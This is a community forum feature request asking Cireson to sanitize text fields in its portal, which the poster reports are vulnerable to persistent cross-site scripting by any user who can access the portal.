We recommend reviewing what is submitted before posting, in case your idea has already been submitted by another community member. If it has been submitted, vote for that existing feature request (by clicking the up arrow) to increase its opportunity of being added to Cireson solutions.
For more information around feature requests in the Cireson Community click here.
Sanitize Text Fields to Protect Against XSS Attacks
HTML tags are very useful in the portal, but currently the portal is vulnerable to persistent cross-site scripting (pXSS) and other XXS attacks by anyone that can access the portal. Specifically comments, descriptions and other text fields.
With this vulnerability, an insider could perform pXSS to do a variety of malicious actions. These actions could include denial of service, malvertising, and malware redirection.
Please update the portal to sanitize user input fields prior to committing them to SCSM.